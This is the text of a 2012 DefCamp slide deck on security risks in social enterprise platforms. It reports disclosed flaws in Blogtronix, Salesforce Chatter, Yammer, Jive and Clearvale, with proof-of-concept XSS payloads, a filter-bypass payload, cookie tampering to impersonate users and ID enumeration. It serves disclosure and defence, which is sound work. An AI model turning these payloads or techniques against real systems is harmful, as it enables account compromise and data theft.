Social Enterprise Rises! …and so are the Risks - DefCamp 2012

Social Enterprise Software Rises!

…and so are the Risks

Marian Ventuneac

[email protected]

@mventuneac

mailto:[email protected]

An Introduction to Web Application Security Risks

2

About myself

Security Architect

International presenter

Member of OWASP and ISACA global organizations

OWASP Ireland Limerick Chapter Leader

https://www.owasp.org/index.php/Ireland-Limerick

Security Researcher PhD, MEng

http://www.ventuneac.net

http://secureappdev.blogspot.com

http://dcsl.ul.ie




http://www.ventuneac.net/

http://www.ventuneac.net/

http://secureappdev.blogspot.com/

http://secureappdev.blogspot.com/

http://dcsl.ul.ie/


3

Agenda

Social Enterprise Software: What, Why, and How?

Social Enterprise Software & Risks

Thoughts on Calculated Risk

Social Enterprise Software & Risks (some case studies)

Final Thoughts


4

Social Enterprise Software: What?

Social Enterprise/Social Enterprise Networks/Social

Enterprise Software

Enterprise solutions providing Facebook-like social

networking functionality

‘social networking’ + ‘enterprise software’ =

‘social enterprise networking’


5

Social Enterprise Software: Why?

Improve communication an increase work efficiency

internal collaboration

establish teams, communities or informal groups

share knowledge and learn from other people experiences

social networking

external collaboration with partners

…

Used by employees and external customers, suppliers,

partners


6

Social Enterprise Software: Deployment models

On-premise solutions

Deployed inside the enterprise network, usually controlled and

managed by the client

Public Cloud-based solutions

Software as a Service (SaaS) - Hosted and administered by the

vendor

Hybrid deployments

Usually open to allow external collaboration

customers, suppliers, third-party contractors, etc


7

Social Enterprise Software: Some of the Risks

Potential loss of enterprise data

Understand what type of data needs to be uploaded there

Do you know/control what data is actually being shared?

Exploitation of common application vulnerabilities

Phishing attacks, social engineering

Viruses and malware

Cloud-based solutions – various compliance and security

concerns

Do you know where is your data stored?


8

Common Strategies for Risk Mitigation

Vendor/supplier due diligence

Security policies (generic/dedicated)

Security processes & procedures

Control the data being shared (data classification)

Verify identity of users accessing the data (authentication)

Control user access to data

Approve/Create/Lock user accounts (accounts management)

Remote wipe (for mobile devices – smartphone, tablets, etc)

…


9

Calculated Risks


10

Calculated Risks (cont)

Business requirement:

WE (the company) need social enterprise software X for Y and Z

reasons.

IT Security (most likely take on it):

Scenario 1: No, there is to much risk to take!

Scenario 2: Yes - We trust our partners and their choices.

Scenario 3: Yes - IF Business ASSUMES ALL THE RISKS…

Scenario 4: Let’s take a closer look at it…

Scenario 5: Yes - the vendor is big enough and we can trust it

(= the vendor takes application security seriously)


Let’s Take a Closer Look

Software defects leading to exploitation of security

vulnerabilities

OWASP Top 10 Security Risks

CVE/SANS Top 25 Programming Errors

Vendor size – a plus, but doesn‘t guarantee the chosen

solution is vulnerability free

It is safe to assume there is no application 100% secure

If anyone claims such a thing, can they provide

reasonable proof?


Let’s Take a Closer Look (cont)

Trust but verify

Reach an agreement to test the chosen solution in a suitable

environment (ideally prior of any contracts being signed)

Manual security testing

Automated security testing

Responsible disclosure

Most likely you will not be

disappointed


The Closer Look (cont)

A practical take on assessing security of social

enterprise software solutions

Some of the chosen ones


The Closer Look (cont)

Assessment criteria including tests for

Cross-Site Scripting (XSS)

Insecure Direct Object Reference

Security Missconfiguration

Failure to Restrict URL Access

Unvalidated Redirects and Forwards

Logical Flaws

…


Blogtronix Enterprise

Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS

CVE-2011-1039 - Multiple XSS Vulnerabilities

Persistent (partially) XSS via Search functionality (auth. user)

HTTP request:

http://test_site/Home/pages/search/?search=

<script>alert(document.cookie)</script>

&sub=1&tab=0

HTTP response:

…

<a href="/Home/pages/search/?search=%3cscript

%3ealert(document.cookie)%3b&sub=1

&tab=0"> <script>alert(docume...</a>

</span> <span style=“

…


Blogtronix Enterprise (cont)

CVE-2011-1039 - Multiple XSS Vulnerabilities

Reflected XSS in login

page via arbitrary parameter

HTTP request:

https://test_site/pages/login/?a"'>

<script>alert(document.cookie)</script>

HTTP response:

<form method="post" action="/pages/login/?

a"'><script>alert(document.cookie)</script>"

id="aspnetForm">

Multiple Reflected XSS

via existing and arbitrary

parameters of existing

resources



Insecure Direct Object Reference (variant)

Valid user A can potentially impersonate another user B

Tamper value of userAccountID_http://test_site/ cookie (ASP.NET

GUID)

1. At login time - replace value of

userAccountID_ cookie with the

one matching user B

2. Do something noticeable

(post a message in group X)

& log out

3. As authenticated user A, review

user recent B’s activity – user B

appears as a recent visitor of group X



Security Missconfiguration

Enumerate valid user IDs

Unauthenticated attacker checks for https://test_site/users/user_id

if user_id exists, redirected to login

if not, display custom error

Enumerate valid groups

Unauthenticated attacker checks for https://test_site/group_id/pages/people/

if group_id exists, redirected to login

if not, display custom error



Improper Error Handling



CVE-2011-1040 Unvalidated Redirects

https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f

Once the user logs in, he/she gets redirected to the resource

previously stated via ReturnUrl parameter

CVE-2011-1041 Failure to restrict access to protected

resources

Attacker knows hashed user ID

and name of uploaded file =>

file can be accessed without auth.

Attacker knows hashed user ID

=> user profile picture can be

accessed without auth.


Salesforce Chatter SaaS

Multiple persistent XSS vulnerabilities

via user profile first &

last name

<a href="/005D00000022Ouw" class=

"entityLink" title="Adam"

onmouseover="alert(1)" Cole">

Adam" onmouseover="alert(1)&

quot; Cole</a>

via group name

<a href="/0F9D0000000PPwz" class=

"entityLink" title="test_group"

onmouseover="alert(3)"">test_group&

quot; onmouseover="alert(3)"</a>


Salesforce Chatter SaaS (cont)

Improper User Input Validation

File Sharing - CR LF symbols accepted into file title

(via SaaS solution) POST /mobile/direct/23.0/

005D0000001yD7B/feed_items.json HTTP/1.1

Host: eu1.salesforce.com

…

Content-Disposition: form-data; name="title”

arv_test52%0a%0d%0a


Salesforce Chatter Desktop

Improper Error Handling leading to Information Disclosure

submitting comments for inexistent posts

HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1

Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at

\"DOPEY.CFEEDCOMMENT\", line 149\nORA-06512: at \"DOPEY.CFEEDCOMMENT\", line

253\nORA-06512: at line 1\n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}

attempting to ‘like’ and inexistent post

HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1

Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at

\"DOPEY.CFEEDLIKE\", line 156\nORA-06512: at \"DOPEY.CFEEDLIKE\", line 217\nORA-06512: at

\"DOPEY.CFEEDLIKE\", line 118\nORA-06512: at line 1\n: {call

cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"}


Yammer

Persistent XSS via group name

HTTP POST request:

/ventuneac.net/groups HTTP/1.1

Host: www.yammer.com

…

-----------------------------295562556131627

Content-Disposition: form-data; name="group[name]"

a4" onmouseover="alert(4)"

-----------------------------295562556131627

HTTP response (home page):

GET /ventuneac.net/ HTTP/1.1

Host: www.yammer.com

…

<a href="/ventuneac.net/groups/a4onmouseoveralert4"

class="nav-list-link" title="a4" onmouseover="alert(4)" group">


Jive

Persistent XSS via group name (create/edit)

HTTP POST request:

POST /create-group.jspa HTTP/1.1

Host: ventuneac.jiveon.com

…

-----------------------------215202979014924

Content-Disposition: form-data; name="description"

group2"><script>alert(1)</script>

-----------------------------215202979014924

HTTP response (load group from Places):

GET /groups/group2 HTTP/1.1

Host: ventuneac.jiveon.com

…

<meta name="description" content="group2">

<script>alert(1)</script>" />


BroadVision Clearvale SaaS

Multiple persistent XSS vulnerabilities

via user profile first &

last name & search page

<a href="http://vmarian.clearvale.com/pg/profile/3"

rel="me" . title="m"

style="xss:expr/*XSS*/ession(

document.location('http://www.google.co.uk'))">

m" style="xss:expr/*XS...</a>

via group name & search page

<a href="http://vmarian.clearvale.com/pg/groups/

23/aaaa-stylexssexprxssessiondocumentlocation

httpwwwgooglecouk/" title="aaa">

<a style="xss:expr/*XSS*/ession(

document.location('http://www.google.co.uk'))">

aaa"><a style="xss:exp...</a>


BroadVision Clearvale SaaS (cont)

The broken fix for user profile name XSS issue

Black-list user input validation

style followed by = becomes style00 (style=, style =, etc)

document.location followed by ( becomes document.location00

alert followed by ( becomes 00

/* becomes /0*

*/ becomes *0/

…

Improper output escaping

for first instance only


BroadVision Clearvale SaaS (cont)

The broken fix for user profile name XSS issue

Bypassing Clearvale XSS filter

XSS payload:

firstname: m” style

lastname: ="/**/;xss:expr/**/ession(alert/**/('aaa'))

HTTP response:

…

<a href="http://vmarian.clearvale.com/pg/profile/3"

rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/('aaa')) ">m" style

="/0**0/;xss:...</a>


Knowing What ‘private’ Really Means

Social Enterprise Software usually provides document

sharing/publishing functionality

Private (not shared with anyone – default option)

Shared with private (locked) groups/members

Shared with public groups

Shared with everyone (shared via public link)

In certain conditions, the private documents can

become… less private


AntiVirus & anti-malware file scanning

BroadVision Clearvale has a built-in AV scanning engine

The rest of tested solutions currently lack such capabilities

Yammer and Salesforce plan to add AV file scanning

No malicious files were used for testing AV capabilities


The Closer Look: Summary

Common security vulnerabilities - can be easily exploited

User shared information is not properly validated and

sanitised

A malicious user can inject JavaScript malware into his/her

profile/groups/actions/etc

Where such user controlled data is seen/accessed by other

users, their accounts can easily get compromised

Exploitation of such vulnerabilities could severely

compromise security of enterprise data


Final Thoughts

Even if the vendor is a market leader, it doesn’t

necessarily mean they get application security right

Dare to ask for proofs of application security

Trust but verify

Vendor due diligence, social enterprise software related

security policies & security procedures, etc

Interested on this kind of benchmarks?

OWASP Security Baseline Project

https://www.owasp.org/index.php/OWASP_Security_Baseline_Project

https://www.owasp.org/index.php/OWASP_Security_Baseline_Project

Thank You [email protected]

@mventuneac

mailto:[email protected]

Documents

Social Enterprise Rises! …and so are the Risks - DefCamp 2012